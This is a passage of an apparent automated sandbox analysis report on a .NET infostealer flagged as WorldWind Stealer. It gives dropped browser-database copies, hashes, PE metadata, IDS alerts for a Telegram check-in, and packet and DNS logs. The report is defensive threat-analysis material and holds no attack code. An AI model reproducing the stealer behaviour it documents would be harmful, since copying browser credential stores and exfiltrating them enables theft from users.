(x86)\IEtQCohfVCGGzXKNQEbDQhqumjSxvtVMOCWgFiqMbOHxqDYaFwSOOJuHbPpwzgUhIBtSQqXTzQmyWYhR\gnGqeVIGKWB.exe..NAME: gnGqeVIGKWB..TITLE: New Tab - Google Chrome..PID: 2996..EXE: C:\Program Files (x86)\IEtQCohfVCGGzXKNQEbDQhqumjSxvtVMOCWgFiqMbOHxqDYaFwSOOJuHbPpwzgUhIBtSQqXTzQmyWYhR\gnGqeVIGKWB.exe..NAME: gnGqeVIGKWB..TITLE: New Tab - Google Chrome..PID: 5092

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\System\WorldWind.jpg

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	73439
Entropy (8bit):	7.807365156061265
Encrypted:	false
SSDEEP:	1536:CdZdT7EgKeIZlK5MQ9wPRC+8pBdShiaCUt7XrJCFHYd+niDDDVnFwNgOye2JK:+ZdvzA4Cc+8yiat7r24oiDDDVCly7K
MD5:	1D0756825DDDFD445810AEA76C470DD0
SHA1:	241FEC2E8A67678493FF8F5653FFA69386D498BB
SHA-256:	914D7F12831B95E035A9EB65F53F4E88A78ED468CCD0E719A099504E736BAF16
SHA-512:	94AFAF8BBE398DE02F7AD14F32236C09D70AB9E339C0544A01FFBBBE0C9019390C8EAE7B47551AA8A7EC265950787D15BFE19339F4A64821D83F7B1BC8D26B45
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..

C:\Users\user\AppData\Local\Temp\places.raw

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCE5B.tmp.dat

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCE7B.tmp.dat

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCE7C.tmp.dat

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCE8D.tmp.dat

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCE8E.tmp.dat

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCE9E.tmp.dat

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCEAF.tmp.dat

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCEC0.tmp.dat

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCED0.tmp.dat

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCF6E.tmp.dat

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCF7E.tmp.dat

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.896780774469789
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	eEo6DAcnnx.exe
File size:	179'200 bytes
MD5:	720b2d599314eaf90cd60038f7e7d2e8
SHA1:	76592e0a64b599fbb49d006faa2de4211dd79834
SHA256:	ea520d8e6ca1d44593f26ceea349d55709ebd61565f67368947d38e484f5846f
SHA512:	eb5a2bc7cd470697cc3613edd51d3af9c4d64f05a71297a6b00c5137956bf269a62253fd60e7b994a750e3cc9eb44dae4275d10dd1356b4ea6140b16b2ab74e2
SSDEEP:	3072:Ie8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gThwARE+WpCc:c6ewwIwQJ6vKX0c5MlYZ0b2+
TLSH:	39045B5837D80A15F3BE5FB8F4B012118B75B477AA1AE75F08E920EE0D62351E911FA3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>..f................................. ........@.. ....................... ............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x42d1be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66AAB33E [Wed Jul 31 21:57:18 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d16c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2e000	0x600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x30000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2b1c4	0x2b200	01b0185d31c991ca23631d9d01a3c39b	False	0.460354393115942	data	5.924241504741651	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x2e000	0x600	0x600	ccd2ec796af2f339686e45e5513c2caf	False	0.4140625	data	4.029504312109572	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x30000	0xc	0x200	8e19c1ec6db51c8435749ecf42a022c8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x2e0a0	0x30c	data			0.4269230769230769
RT_MANIFEST	0x2e3ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-04T14:57:44.447804+0200	TCP	2044766	ET MALWARE WorldWind Stealer Checkin via Telegram (GET)	49720	443	192.168.2.6	149.154.167.220
2024-08-04T14:57:45.338829+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49721	443	192.168.2.6	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 4, 2024 14:57:40.559442043 CEST	49717	80	192.168.2.6	104.16.185.241
Aug 4, 2024 14:57:40.564435005 CEST	80	49717	104.16.185.241	192.168.2.6
Aug 4, 2024 14:57:40.564616919 CEST	49717	80	192.168.2.6	104.16.185.241
Aug 4, 2024 14:57:40.565438986 CEST	49717	80	192.168.2.6	104.16.185.241
Aug 4, 2024 14:57:40.570441008 CEST	80	49717	104.16.185.241	192.168.2.6
Aug 4, 2024 14:57:41.031182051 CEST	80	49717	104.16.185.241	192.168.2.6
Aug 4, 2024 14:57:41.079508066 CEST	49717	80	192.168.2.6	104.16.185.241
Aug 4, 2024 14:57:41.242355108 CEST	49718	443	192.168.2.6	172.67.196.114
Aug 4, 2024 14:57:41.242427111 CEST	443	49718	172.67.196.114	192.168.2.6
Aug 4, 2024 14:57:41.242522955 CEST	49718	443	192.168.2.6	172.67.196.114
Aug 4, 2024 14:57:41.251118898 CEST	49718	443	192.168.2.6	172.67.196.114
Aug 4, 2024 14:57:41.251163006 CEST	443	49718	172.67.196.114	192.168.2.6
Aug 4, 2024 14:57:41.717142105 CEST	443	49718	172.67.196.114	192.168.2.6
Aug 4, 2024 14:57:41.717411995 CEST	49718	443	192.168.2.6	172.67.196.114
Aug 4, 2024 14:57:41.721509933 CEST	49718	443	192.168.2.6	172.67.196.114
Aug 4, 2024 14:57:41.721537113 CEST	443	49718	172.67.196.114	192.168.2.6
Aug 4, 2024 14:57:41.722008944 CEST	443	49718	172.67.196.114	192.168.2.6
Aug 4, 2024 14:57:41.767054081 CEST	49718	443	192.168.2.6	172.67.196.114
Aug 4, 2024 14:57:41.771828890 CEST	49718	443	192.168.2.6	172.67.196.114
Aug 4, 2024 14:57:41.816508055 CEST	443	49718	172.67.196.114	192.168.2.6
Aug 4, 2024 14:57:43.634557009 CEST	443	49718	172.67.196.114	192.168.2.6
Aug 4, 2024 14:57:43.634840012 CEST	443	49718	172.67.196.114	192.168.2.6
Aug 4, 2024 14:57:43.634903908 CEST	49718	443	192.168.2.6	172.67.196.114
Aug 4, 2024 14:57:43.638371944 CEST	49718	443	192.168.2.6	172.67.196.114
Aug 4, 2024 14:57:43.643163919 CEST	49717	80	192.168.2.6	104.16.185.241
Aug 4, 2024 14:57:43.648751020 CEST	80	49717	104.16.185.241	192.168.2.6
Aug 4, 2024 14:57:43.648817062 CEST	49717	80	192.168.2.6	104.16.185.241
Aug 4, 2024 14:57:43.652026892 CEST	49720	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:43.652065039 CEST	443	49720	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:43.652179003 CEST	49720	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:43.652666092 CEST	49720	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:43.652678967 CEST	443	49720	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:44.273276091 CEST	443	49720	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:44.273355961 CEST	49720	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:44.275233984 CEST	49720	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:44.275239944 CEST	443	49720	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:44.275638103 CEST	443	49720	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:44.277087927 CEST	49720	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:44.277131081 CEST	443	49720	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:44.447873116 CEST	443	49720	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:44.447962999 CEST	443	49720	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:44.448014021 CEST	49720	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:44.448465109 CEST	49720	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:44.457233906 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:44.457267046 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:44.459455967 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:44.459455967 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:44.459494114 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:45.088793039 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:45.090373993 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:45.090395927 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:45.338901043 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:45.339004993 CEST	443	49721	149.154.167.220	192.168.2.6
Aug 4, 2024 14:57:45.339312077 CEST	49721	443	192.168.2.6	149.154.167.220
Aug 4, 2024 14:57:45.339718103 CEST	49721	443	192.168.2.6	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 4, 2024 14:57:40.474412918 CEST	65004	53	192.168.2.6	1.1.1.1
Aug 4, 2024 14:57:40.482718945 CEST	53	65004	1.1.1.1	192.168.2.6
Aug 4, 2024 14:57:40.543884993 CEST	49931	53	192.168.2.6	1.1.1.1
Aug 4, 2024 14:57:40.554239988 CEST	53	49931	1.1.1.1	192.168.2.6
Aug 4, 2024 14:57:41.095520973 CEST	52798	53	192.168.2.6	1.1.1.1
Aug 4, 2024 14:57:41.241413116 CEST	53	52798	1.1.1.1	192.168.2.6
Aug 4, 2024 14:57:43.643757105 CEST	52730	53	192.168.2.6	1.1.1.1
Aug 4, 2024 14:57:43.651343107 CEST	53	52730	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 4, 2024 14:57:40.474412918 CEST	192.168.2.6	1.1.1.1	0x38ba	Standard query (0)	55.235.10.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Aug 4, 2024 14:57:40.543884993 CEST	192.168.2.6	1.1.1.1	0x44b8	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
